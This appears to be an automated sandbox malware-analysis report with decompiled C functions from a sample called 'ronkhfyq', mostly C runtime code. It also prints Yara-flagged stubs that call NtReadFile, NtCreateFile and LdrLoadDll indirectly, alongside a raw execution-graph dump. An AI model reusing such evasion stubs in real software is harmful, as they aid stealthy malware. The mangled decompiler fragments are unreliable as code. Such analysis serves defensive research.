              • Opcode Fuzzy Hash: 8d6748c4b0b5d18005011c8eead7495842b3154eda36777b89fbb00ae4c9b7c1
              • Instruction Fuzzy Hash: 3481D4719052458FCB24CF79C8419EDBBF0AF09324B24A26DE4A6BB3D1D7349983CB54
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 91%
              			E00E13825(void* __ebx, void* __edi, void* __eflags) {
              				void* __esi;
              				void* _t3;
              				intOrPtr _t6;
              				long _t14;
              				long* _t27;
              
              				E00E118A0(_t3);
              				if(E00E14570() != 0) {
              					_t6 = E00E14011(E00E135B6);
              					 *0xe2350c = _t6;
              					__eflags = _t6 - 0xffffffff;
              					if(_t6 == 0xffffffff) {
              						goto L1;
              					} else {
              						_t27 = E00E14879(1, 0x3bc);
              						__eflags = _t27;
              						if(_t27 == 0) {
              							L6:
              							E00E1389B();
              							__eflags = 0;
              							return 0;
              						} else {
              							__eflags = E00E1406D( *0xe2350c, _t27);
              							if(__eflags == 0) {
              								goto L6;
              							} else {
              								_push(0);
              								_push(_t27);
              								E00E13772(__ebx, __edi, _t27, __eflags);
              								_t14 = GetCurrentThreadId();
              								_t27[1] = _t27[1] | 0xffffffff;
              								 *_t27 = _t14;
              								__eflags = 1;
              								return 1;
              							}
              						}
              					}
              				} else {
              					L1:
              					E00E1389B();
              					return 0;
              				}
              			}









              APIs
              • __init_pointers.LIBCMT ref: 00E13825
                • Part of subcall function 00E118A0: RtlEncodePointer.NTDLL(00000000,?,00E1382A,00E1164A,00E22190,00000014), ref: 00E118A3
                • Part of subcall function 00E118A0: __initp_misc_winsig.LIBCMT ref: 00E118BE
                • Part of subcall function 00E118A0: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00E14127
                • Part of subcall function 00E118A0: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00E1413B
                • Part of subcall function 00E118A0: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00E1414E
                • Part of subcall function 00E118A0: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00E14161
                • Part of subcall function 00E118A0: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00E14174
                • Part of subcall function 00E118A0: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00E14187
                • Part of subcall function 00E118A0: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00E1419A
                • Part of subcall function 00E118A0: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00E141AD
                • Part of subcall function 00E118A0: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00E141C0
                • Part of subcall function 00E118A0: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00E141D3
                • Part of subcall function 00E118A0: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00E141E6
                • Part of subcall function 00E118A0: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00E141F9
                • Part of subcall function 00E118A0: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00E1420C
                • Part of subcall function 00E118A0: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00E1421F
                • Part of subcall function 00E118A0: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00E14232
                • Part of subcall function 00E118A0: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00E14245
              • __mtinitlocks.LIBCMT ref: 00E1382A
              • __mtterm.LIBCMT ref: 00E13833
                • Part of subcall function 00E1389B: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00E13838,00E1164A,00E22190,00000014), ref: 00E1448A
                • Part of subcall function 00E1389B: _free.LIBCMT ref: 00E14491
                • Part of subcall function 00E1389B: DeleteCriticalSection.KERNEL32(XK,?,?,00E13838,00E1164A,00E22190,00000014), ref: 00E144B3
              • __calloc_crt.LIBCMT ref: 00E13858
              • __initptd.LIBCMT ref: 00E1387A
              • GetCurrentThreadId.KERNEL32 ref: 00E13881
              Memory Dump Source
              • Source File: 00000001.00000002.238505505.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
              • Associated: 00000001.00000002.238496056.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
              • Associated: 00000001.00000002.238525617.0000000000E1E000.00000002.00000001.01000000.00000004.sdmp
              • Associated: 00000001.00000002.238533009.0000000000E23000.00000004.00000001.01000000.00000004.sdmp
              • Associated: 00000001.00000002.238538559.0000000000E27000.00000002.00000001.01000000.00000004.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_e10000_ronkhfyq.jbxd
              Similarity
              • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
              • String ID:
              • API String ID: 3567560977-0
              • Opcode ID: dab6a8b8ca977ad1e110b7982529c384c8eb8a478b773363a914816a1dbf1a18
              • Instruction ID: 529ad6d4e10df530e88ead8e88d8a4bcef86403103d4ad6fbb5532aa8f76deca
              • Opcode Fuzzy Hash: dab6a8b8ca977ad1e110b7982529c384c8eb8a478b773363a914816a1dbf1a18
              • Instruction Fuzzy Hash: 36F0B4B25183211EE23C7B757C076CA2BC19F41B74B21A62AF565F92D2FF51CAC24A90
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E00E191D6(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
              				char _v8;
              				intOrPtr _v12;
              				signed int _v20;
              				signed int _t35;
              				int _t38;
              				signed int _t41;
              				int _t42;
              				intOrPtr* _t44;
              				int _t47;
              				short* _t49;
              				intOrPtr _t50;
              				intOrPtr _t54;
              				int _t55;
              				signed int _t59;
              				char* _t62;
              
              				_t62 = _a8;
              				if(_t62 == 0) {
              					L5:
              					return 0;
              				}
              				_t50 = _a12;
              				if(_t50 == 0) {
              					goto L5;
              				}
              				if( *_t62 != 0) {
              					E00E14C0C( &_v20, _a16);
              					_t35 = _v20;
              					__eflags =  *(_t35 + 0xa8);
              					if( *(_t35 + 0xa8) != 0) {
              						_t38 = E00E1918B( *_t62 & 0x000000ff,  &_v20);
              						__eflags = _t38;
              						if(_t38 == 0) {
              							__eflags = _a4;
              							_t41 = _v20;
              							_t59 = 1;
              							_t28 = _t41 + 4; // 0x840ffff8
              							_t42 = MultiByteToWideChar( *_t28, 9, _t62, 1, _a4, 0 | _a4 != 0x00000000);
              							__eflags = _t42;
              							if(_t42 != 0) {
              								L21:
              								__eflags = _v8;
              								if(_v8 != 0) {
              									_t54 = _v12;
              									_t31 = _t54 + 0x70;
              									 *_t31 =  *(_t54 + 0x70) & 0xfffffffd;
              									__eflags =  *_t31;
              								}
              								return _t59;
              							}
              							L20:
              							_t44 = E00E11CD3();
              							_t59 = _t59 | 0xffffffff;
              							__eflags = _t59;
              							 *_t44 = 0x2a;
              							goto L21;
              						}
              						_t59 = _v20;
              						__eflags =  *(_t59 + 0x74) - 1;
              						if( *(_t59 + 0x74) <= 1) {
              							L15:
              							_t20 = _t59 + 0x74; // 0xe1c11fe1
              							__eflags = _t50 -  *_t20;
              							L16:
              							if(__eflags < 0) {
              								goto L20;
              							}
              							__eflags = _t62[1];
              							if(_t62[1] == 0) {
              								goto L20;
              							}
              							L18:
              							_t22 = _t59 + 0x74; // 0xe1c11fe1
              							_t59 =  *_t22;
              							goto L21;
              						}
              						_t12 = _t59 + 0x74; // 0xe1c11fe1
              						__eflags = _t50 -  *_t12;
              						if(__eflags < 0) {
              							goto L16;
              						}
              						__eflags = _a4;
              						_t17 = _t59 + 0x74; // 0xe1c11fe1
              						_t18 = _t59 + 4; // 0x840ffff8
              						_t47 = MultiByteToWideChar( *_t18, 9, _t62,  *_t17, _a4, 0 | _a4 != 0x00000000);
              						_t59 = _v20;
              						__eflags = _t47;
              						if(_t47 != 0) {
              							goto L18;
              						}
              						goto L15;
              					}
              					_t55 = _a4;
              					__eflags = _t55;
              					if(_t55 != 0) {
              						 *_t55 =  *_t62 & 0x000000ff;
              					}
              					_t59 = 1;
              					goto L21;
              				}
              				_t49 = _a4;
              				if(_t49 != 0) {
              					 *_t49 = 0;
              				}
              				goto L5;
              			}

              APIs
              • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00E1920C
              • __isleadbyte_l.LIBCMT ref: 00E1923A
              • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,E1C11FE1,00BFBBEF,00000000), ref: 00E19268
              • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,00000001,00BFBBEF,00000000), ref: 00E1929E
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.238505505.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
              • Associated: 00000001.00000002.238496056.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
              • Associated: 00000001.00000002.238525617.0000000000E1E000.00000002.00000001.01000000.00000004.sdmp
              • Associated: 00000001.00000002.238533009.0000000000E23000.00000004.00000001.01000000.00000004.sdmp
              • Associated: 00000001.00000002.238538559.0000000000E27000.00000002.00000001.01000000.00000004.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_e10000_ronkhfyq.jbxd
              Similarity
              • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
              • String ID: Ha
              • API String ID: 3058430110-1493737000
              • Opcode ID: b1bf98f25da37ee0f2c22274128a808cb164313fd09105a7d9dfc5342ff17b94
              • Instruction ID: 125f5428a789225493ff3e53c0835534989de83673c38399f674e3e39fb3c75e
              • Opcode Fuzzy Hash: b1bf98f25da37ee0f2c22274128a808cb164313fd09105a7d9dfc5342ff17b94
              • Instruction Fuzzy Hash: F531D03160024ABFDB218E65DC54BFA7BE5FF41324F155528F825A71A2D730D8D0DB90
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 95%
              			E00E17462(void* __ebx, void* __edx, void* __edi, void* _a4, long _a8) {
              				void* _t7;
              				void* _t8;
              				intOrPtr* _t9;
              				intOrPtr* _t12;
              				void* _t20;
              				long _t31;
              
              				if(_a4 != 0) {
              					_t31 = _a8;
              					if(_t31 != 0) {
              						_push(__ebx);
              						while(_t31 <= 0xffffffe0) {
              							if(_t31 == 0) {
              								_t31 = _t31 + 1;
              							}
              							_t7 = HeapReAlloc( *0xe24834, 0, _a4, _t31);
              							_t20 = _t7;
              							if(_t20 != 0) {
              								L17:
              								_t8 = _t20;
              							} else {
              								if( *0xe24830 == _t7) {
              									_t9 = E00E11CD3();
              									 *_t9 = E00E11CE6(GetLastError());
              									goto L17;
              								} else {
              									if(E00E11751(_t7, _t31) == 0) {
              										_t12 = E00E11CD3();
              										 *_t12 = E00E11CE6(GetLastError());
              										L12:
              										_t8 = 0;
              									} else {
              										continue;
              									}
              								}
              							}
              							goto L14;
              						}
              						E00E11751(_t6, _t31);
              						 *((intOrPtr*)(E00E11CD3())) = 0xc;
              						goto L12;
              					} else {
              						E00E14841(_a4);
              						_t8 = 0;
              					}
              					L14:
              					return _t8;
              				} else {
              					return E00E11151(__ebx, __edx, __edi, _a8);
              				}
              			}

              APIs
              • _malloc.LIBCMT ref: 00E1746E
                • Part of subcall function 00E11151: __FF_MSGBANNER.LIBCMT ref: 00E11168
                • Part of subcall function 00E11151: __NMSG_WRITE.LIBCMT ref: 00E1116F
                • Part of subcall function 00E11151: RtlAllocateHeap.NTDLL(00B50000,00000000,00000001,00000000,00000000,00000000,?,00E148D7,00000000,00000000,00000000,00000000,?,00E14509,00000018,00E22280), ref: 00E11194
              • _free.LIBCMT ref: 00E17481
              Memory Dump Source
              • Source File: 00000001.00000002.238505505.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
              • Associated: 00000001.00000002.238496056.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
              • Associated: 00000001.00000002.238525617.0000000000E1E000.00000002.00000001.01000000.00000004.sdmp
              • Associated: 00000001.00000002.238533009.0000000000E23000.00000004.00000001.01000000.00000004.sdmp
              • Associated: 00000001.00000002.238538559.0000000000E27000.00000002.00000001.01000000.00000004.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_e10000_ronkhfyq.jbxd
              Similarity
              • API ID: AllocateHeap_free_malloc
              • String ID:
              • API String ID: 1020059152-0
              • Opcode ID: fde00b9ef8e8c56fe1f4fb246e61f3c3affb25cbb129e212f2301da78865733a
              • Instruction ID: fdb8bdce638781f931dc4c01639e15a75793aeaff45d74b0f0adafd60c927542
              • Opcode Fuzzy Hash: fde00b9ef8e8c56fe1f4fb246e61f3c3affb25cbb129e212f2301da78865733a
              • Instruction Fuzzy Hash: AA11E77190D2196FCB352F75AC447DA3EE46F04764B206565FA99B6290DA3088C086D0
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 77%
              			E00E18BD1(void* __ebx, void* __edi, void* __esi, void* __eflags) {
              				void* _t4;
              				void* _t15;
              				void* _t17;
              
              				_push(8);
              				_push(0xe224b0);
              				_t4 = E00E12410(__ebx, __edi, __esi);
              				_t17 =  *0xe23d3c - 0xe23d40; // 0xe23d40
              				if(_t17 != 0) {
              					E00E1443F(0xc);
              					 *(_t15 - 4) =  *(_t15 - 4) & 0x00000000;
              					 *0xe23d3c = E00E173E6("@=\xef\xbf\xbd", 0x					 *(_t15 - 4) = 0xfffffffe;
              					_t4 = E00E18C1A();
              				}
              				return E00E12455(_t4);
              			}

              APIs
              • __lock.LIBCMT ref: 00E18BEC
                • Part of subcall function 00E1443F: __mtinitlocknum.LIBCMT ref: 00E14451
                • Part of subcall function 00E1443F: EnterCriticalSection.KERNEL32(00000000,?,00E137BB,0000000D), ref: 00E1446A
              • __updatetlocinfoEx_nolock.LIBCMT ref: 00E18BFC
                • Part of subcall function 00E173E6: ___addlocaleref.LIBCMT ref: 00E17402
                • Part of subcall function 00E173E6: ___removelocaleref.LIBCMT ref: 00E1740D
                • Part of subcall function 00E173E6: ___freetlocinfo.LIBCMT ref: 00E17421
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.238505505.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
              • Associated: 00000001.00000002.238496056.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
              • Associated: 00000001.00000002.238525617.0000000000E1E000.00000002.00000001.01000000.00000004.sdmp
              • Associated: 00000001.00000002.238533009.0000000000E23000.00000004.00000001.01000000.00000004.sdmp
              • Associated: 00000001.00000002.238538559.0000000000E27000.00000002.00000001.01000000.00000004.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_e10000_ronkhfyq.jbxd
              Similarity
              • API ID: CriticalEnterEx_nolockSection___addlocaleref___freetlocinfo___removelocaleref__lock__mtinitlocknum__updatetlocinfo
              • String ID: @=$@=
              • API String ID: 547918592-965070868
              • Opcode ID: c88c94099e2aede67bb4eb9d19a68137be84662e34fdd79b24ed1f6460fa45f0
              • Instruction ID: 42f03b9cd0e85821d495f9703154dc4d23cab859f8ab9fe07709a741ef8f1e57
              • Opcode Fuzzy Hash: c88c94099e2aede67bb4eb9d19a68137be84662e34fdd79b24ed1f6460fa45f0
              • Instruction Fuzzy Hash: 8CE08671545320EAD6207B717D43BCCF2F05B00B25F50751AF164771C1CD785AC05EA2
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E00E1A95D(void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
              				intOrPtr _t25;
              				void* _t26;
              
              				_t25 = _a16;
              				if(_t25 == 0x65 || _t25 == 0x45) {
              					_t26 = E00E1AEAE(__eflags, _a4, _a8, _a12, _a20, _a24, _a28);
              					goto L9;
              				} else {
              					_t34 = _t25 - 0x66;
              					if(_t25 != 0x66) {
              						__eflags = _t25 - 0x61;
              						if(_t25 == 0x61) {
              							L7:
              							_t26 = E00E1A9E3(_a4, _a8, _a12, _a20, _a24, _a28);
              						} else {
              							__eflags = _t25 - 0x41;
              							if(__eflags == 0) {
              								goto L7;
              							} else {
              								_t26 = E00E1B129(__esi, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
              							}
              						}
              						L9:
              						return _t26;
              					} else {
              						return E00E1B068(__esi, _t34, _a4, _a8, _a12, _a20, _a28);
              					}
              				}
              			}

              APIs
              Memory Dump Source
              • Source File: 00000001.00000002.238505505.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
              • Associated: 00000001.00000002.238496056.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
              • Associated: 00000001.00000002.238525617.0000000000E1E000.00000002.00000001.01000000.00000004.sdmp
              • Associated: 00000001.00000002.238533009.0000000000E23000.00000004.00000001.01000000.00000004.sdmp
              • Associated: 00000001.00000002.238538559.0000000000E27000.00000002.00000001.01000000.00000004.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_e10000_ronkhfyq.jbxd
              Similarity
              • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
              • String ID:
              • API String ID: 3016257755-0
              • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
              • Instruction ID: 489854a5261fd241575a117183a2f0aa3d04ed14917c035307d5b41b11fa13ae
              • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
              • Instruction Fuzzy Hash: 6B014C7204114EFBCF125E84DC018EE3F67BB58354B5A9425FE1868031C336C9F1AB82
              Uniqueness

              Uniqueness Score: -1.00%

              Execution Graph

              Execution Coverage:6.1%
              Dynamic/Decrypted Code Coverage:0%
              Signature Coverage:3.6%
              Total number of Nodes:590
              Total number of Limit Nodes:74
407ed2 22871->22873 22899 407b10 22871->22899 22872 407b10 8 API calls 22872->22874 22875 4074d0 LdrLoadDll 22873->22875 22874->22864 22874->22872 22876 407f92 22874->22876 22875->22862 22877 4074d0 LdrLoadDll 22876->22877 22877->22864 22879 41af60 LdrLoadDll 22878->22879 22880 40ad62 22879->22880 22881 40d7f0 22880->22881 22882 40d80d 22881->22882 23061 419f70 22882->23061 22885 40d855 22885->22396 22886 419fc0 LdrLoadDll 22887 40d87e 22886->22887 22887->22396 22889 41af60 LdrLoadDll 22888->22889 22890 40adc5 22889->22890 22890->22402 22890->22405 22892 41af60 LdrLoadDll 22891->22892 22893 40ae99 22892->22893 22893->22413 22895 41af60 LdrLoadDll 22894->22895 22896 40aeec 22895->22896 22896->22417 22897->22857 22898->22855 22900 407b35 22899->22900 22933 419cc0 22900->22933 22903 407b89 22903->22871 22904 407c0a 22968 40d940 LdrLoadDll NtClose 22904->22968 22905 419eb0 LdrLoadDll 22906 407bad 22905->22906 22906->22904 22907 407bb8 22906->22907 22909 407c36 22907->22909 22936 40af00 22907->22936 22909->22871 22910 407c25 22912 407c42 22910->22912 22913 407c2c 22910->22913 22969 419d40 LdrLoadDll 22912->22969 22915 41a440 2 API calls 22913->22915 22914 407bd2 22914->22909 22956 407940 22914->22956 22915->22909 22917 407c6d 22919 40af00 2 API calls 22917->22919 22921 407c8d 22919->22921 22921->22909 22970 419d70 LdrLoadDll 22921->22970 22923 407cb2 22971 419e00 LdrLoadDll 22923->22971 22925 407ccc 22926 419dd0 LdrLoadDll 22925->22926 22927 407cdb 22926->22927 22928 41a440 2 API calls 22927->22928 22929 407ce5 22928->22929 22972 407710 22929->22972 22931 407cf9 22931->22871 22932->22868 22934 41af60 LdrLoadDll 22933->22934 22935 407b7f 22934->22935 22935->22903 22935->22904 22935->22905 22937 40af2b 22936->22937 22938 40d7f0 LdrLoadDll 22937->22938 22939 40af8a 22938->22939 22940 40afd3 22939->22940 22941 419fc0 LdrLoadDll 22939->22941 22940->22914 22942 40afb5 22941->22942 22943 40afbc 22942->22943 22946 40afdf 22942->22946 22944 41a010 LdrLoadDll 22943->22944 22945 
40afc9 22944->22945 22947 41a440 2 API calls 22945->22947 22948 40b049 22946->22948 22949 40b029 22946->22949 22947->22940 22951 41a010 LdrLoadDll 22948->22951 22950 41a440 2 API calls 22949->22950 22952 40b036 22950->22952 22953 40b05b 22951->22953 22952->22914 22954 41a440 2 API calls 22953->22954 22955 40b065 22954->22955 22955->22914 22957 407956 22956->22957 22988 419830 22957->22988 22959 40796f 22964 407ae1 22959->22964 23009 407510 22959->23009 22961 407a55 22962 407710 7 API calls 22961->22962 22961->22964 22963 407a83 22962->22963 22963->22964 22965 419eb0 LdrLoadDll 22963->22965 22964->22871 22966 407ab8 22965->22966 22966->22964 22967 41a4b0 LdrLoadDll 22966->22967 22967->22964 22968->22910 22969->22917 22970->22923 22971->22925 22973 407739 22972->22973 23043 407680 22973->23043 22976 41a4b0 LdrLoadDll 22977 40774c 22976->22977 22977->22976 22978 4077d7 22977->22978 22980 4077d2 22977->22980 23051 40d9c0 22977->23051 22978->22931 22979 41a440 2 API calls 22981 40780a 22979->22981 22980->22979 22981->22978 22982 419cc0 LdrLoadDll 22981->22982 22983 40786f 22982->22983 22983->22978 23055 419d00 22983->23055 22985 4078d3 22985->22978 22986 415690 6 API calls 22985->22986 22987 407928 22986->22987 22987->22931 22989 41c0b0 2 API calls 22988->22989 22990 419847 22989->22990 23016 408760 22990->23016 22992 419862 22993 419889 22992->22993 22994 4198a0 22992->22994 22995 41bee0 2 API calls 22993->22995 22996 41be60 2 API calls 22994->22996 22997 419896 22995->22997 22998 4198da 22996->22998 22997->22959 22999 41be60 2 API calls 22998->22999 23000 4198f3 22999->23000 23006 419b94 23000->23006 23022 41bea0 23000->23022 23003 419b80 23004 41bee0 2 API calls 23003->23004 23005 419b8a 23004->23005 23005->22959 23007 41bee0 2 API calls 23006->23007 23008 419be9 23007->23008 23008->22959 23010 40760f 23009->23010 23011 407525 23009->23011 23010->22961 23011->23010 23012 415690 6 API calls 23011->23012 23014 407592 23012->23014 23013 4075b9 23013->22961 23014->23013 
23015 41bee0 2 API calls 23014->23015 23015->23013 23017 408785 23016->23017 23018 40a130 LdrLoadDll 23017->23018 23019 4087b8 23018->23019 23021 4087dd 23019->23021 23025 40b930 23019->23025 23021->22992 23040 41a530 23022->23040 23026 40b95c 23025->23026 23027 41a190 LdrLoadDll 23026->23027 23028 40b975 23027->23028 23029 40b97c 23028->23029 23036 41a1d0 23028->23036 23029->23021 23033 40b9b7 23034 41a440 2 API calls 23033->23034 23035 40b9da 23034->23035 23035->23021 23037 41af60 LdrLoadDll 23036->23037 23038 40b99f 23036->23038 23037->23038 23038->23029 23039 41a7c0 LdrLoadDll 23038->23039 23039->23033 23041 41af60 LdrLoadDll 23040->23041 23042 419b79 23041->23042 23042->23003 23042->23006 23044 407698 23043->23044 23045 40a130 LdrLoadDll 23044->23045 23046 4076b3 23045->23046 23047 415a90 LdrLoadDll 23046->23047 23048 4076c3 23047->23048 23049 4076cc PostThreadMessageW 23048->23049 23050 4076e0 23048->23050 23049->23050 23050->22977 23052 40d9d3 23051->23052 23058 419e40 23052->23058 23056 419d1c 23055->23056 23057 41af60 LdrLoadDll 23055->23057 23056->22985 23057->23056 23059 41af60 LdrLoadDll 23058->23059 23060 40d9fe 23059->23060 23060->22977 23062 41af60 LdrLoadDll 23061->23062 23063 40d84e 23062->23063 23063->22885 23063->22886

              Control-flow Graph

              C-Code - Quality: 37%
              			E0041A368(void* __eflags, void* _a4, void* _a8, void* _a12, void* _a16, void* _a20, void* _a24, void* _a28, void* _a32, void* _a36, void* _a40, void* _a44) {
              
              				asm("repne add ah, [0x2f344935]");
              				if (__eflags >= 0) goto L3;
              			}




              APIs
              • NtReadFile.NTDLL(004159B2,5DA515B3,FFFFFFFF,?,?,?,004159B2,?,qVA,FFFFFFFF,5DA515B3,004159B2,?,00000000), ref: 0041A405
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.302895088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_ronkhfyq.jbxd
              Yara matches
              Similarity
              • API ID: FileRead
              • String ID: ZUA$qVA
              • API String ID: 2738559852-3024105696
              • Opcode ID: d076181294628f61b5ffb9e54f19e727403ec0c8bc439c4acaee68367e2c69a1
              • Instruction ID: e3bf853c9b3b2f146e70fd2481cd6938a8fa9f888ecdbdf632ae88522e541e96
              • Opcode Fuzzy Hash: d076181294628f61b5ffb9e54f19e727403ec0c8bc439c4acaee68367e2c69a1
              • Instruction Fuzzy Hash: 6821D3B2200108AFCB14DF99DC84EEB77ADEF8C724F158249BA0DA7241D634E811CBA0
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 11 41a3c0-41a409 call 41af60 NtReadFile
              C-Code - Quality: 37%
              			E0041A3C0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, char _a40) {
              				intOrPtr _t13;
              				void* _t18;
              				void* _t27;
              				intOrPtr* _t28;
              
              				_t13 = _a4;
              				_t28 = _t13 + 0xc64;
              				E0041AF60( *((intOrPtr*)(_t13 + 0x14)), _t13, _t28,  *((intOrPtr*)(_t13 + 0x14)), 0, 0x2a);
              				_t4 =  &_a40; // 0x415671
              				_t18 =  *((intOrPtr*)( *_t28))(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36,  *_t4, _t27); // executed
              				return _t18;
              			}








              APIs
              • NtReadFile.NTDLL(004159B2,5DA515B3,FFFFFFFF,?,?,?,004159B2,?,qVA,FFFFFFFF,5DA515B3,004159B2,?,00000000), ref: 0041A405
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.302895088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_ronkhfyq.jbxd
              Yara matches
              Similarity
              • API ID: FileRead
              • String ID: qVA
              • API String ID: 2738559852-1195921569
              • Opcode ID: b510bff5fdfeed8eb0fffb7cee2b24ec4e8af31a288f6594e015d3a0b80bf648
              • Instruction ID: 73ffa567400af51592167d85ddd4e2221f8c27920a6f65a97cb7e9eff46762f8
              • Opcode Fuzzy Hash: b510bff5fdfeed8eb0fffb7cee2b24ec4e8af31a288f6594e015d3a0b80bf648
              • Instruction Fuzzy Hash: 99F0B7B2200208AFCB14DF99DC85EEB77ADEF8C754F158249BE0D97241D630E811CBA5
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 270 40a130-40a159 call 41cdb0 273 40a15b-40a15e 270->273 274 40a15f-40a16d call 41d1d0 270->274 277 40a17d-40a18e call 41b500 274->277 278 40a16f-40a17a call 41d450 274->278 283 40a190-40a1a4 LdrLoadDll 277->283 284 40a1a7-40a1aa 277->284 278->277 283->284
              C-Code - Quality: 100%
              			E0040A130(void* __eflags, void* _a4, intOrPtr _a8) {
              				char* _v8;
              				struct _EXCEPTION_RECORD _v12;
              				struct _OBJDIR_INFORMATION _v16;
              				char _v536;
              				void* _t15;
              				struct _OBJDIR_INFORMATION _t17;
              				struct _OBJDIR_INFORMATION _t18;
              				void* _t30;
              				void* _t31;
              				void* _t32;
              
              				_v8 =  &_v536;
              				_t15 = E0041CDB0( &_v12, 0x104, _a8);
              				_t31 = _t30 + 0xc;
              				if(_t15 != 0) {
              					_t17 = E0041D1D0(__eflags, _v8);
              					_t32 = _t31 + 4;
              					__eflags = _t17;
              					if(_t17 != 0) {
              						E0041D450( &_v12, 0);
              						_t32 = _t32 + 8;
              					}
              					_t18 = E0041B500(_v8);
              					_v16 = _t18;
              					__eflags = _t18;
              					if(_t18 == 0) {
              						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
              						return _v16;
              					}
              					return _t18;
              				} else {
              					return _t15;
              				}
              			}














              APIs
              • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040A1A2
              Memory Dump Source
              • Source File: 00000002.00000002.302895088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_ronkhfyq.jbxd
              Yara matches
              Similarity
              • API ID: Load
              • String ID:
              • API String ID: 2234796835-0
              • Opcode ID: 14d9637ae75740dab2169e9387d270c154b89039a09ccd4394a8d994bcbcbc66
              • Instruction ID: 362e94697f91f25e03f34ab22cb5edf479b96fa73b6a4b5d0a09f6ce58eb7145
              • Opcode Fuzzy Hash: 14d9637ae75740dab2169e9387d270c154b89039a09ccd4394a8d994bcbcbc66
              • Instruction Fuzzy Hash: 8D0112B5D4020DB7DB10DBA5DC42FDEB7789B54308F0041A6A908A7281F675EB54CB95
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 285 41a30a-41a361 call 41af60 NtCreateFile
              C-Code - Quality: 82%
              			E0041A30A(void* __ebx, void* __ecx, HANDLE* _a4, long _a8, struct _EXCEPTION_RECORD _a12, struct _ERESOURCE_LITE _a16, struct _GUID _a20, long _a24, long _a28, long _a32, long _a36, void* _a40, long _a44) {
              				intOrPtr _v0;
              				signed int _v117;
              				long _t23;
              
              				asm("fdivr qword [ecx]");
              				_v117 =  !_v117;
              				_t17 = _v0;
              				_t5 = _t17 + 0xc5c; // 0xc5c
              				E0041AF60( *((intOrPtr*)(_v0 + 0x14)), _t17, _t5,  *((intOrPtr*)(_v0 + 0x14)), 0, 0x28);
